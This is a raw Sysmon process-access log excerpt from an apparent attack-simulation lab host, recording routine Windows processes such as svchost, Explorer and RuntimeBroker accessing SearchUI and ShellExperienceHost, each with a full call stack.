07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001049941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.873{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.873{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.872{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.871{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.
dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System3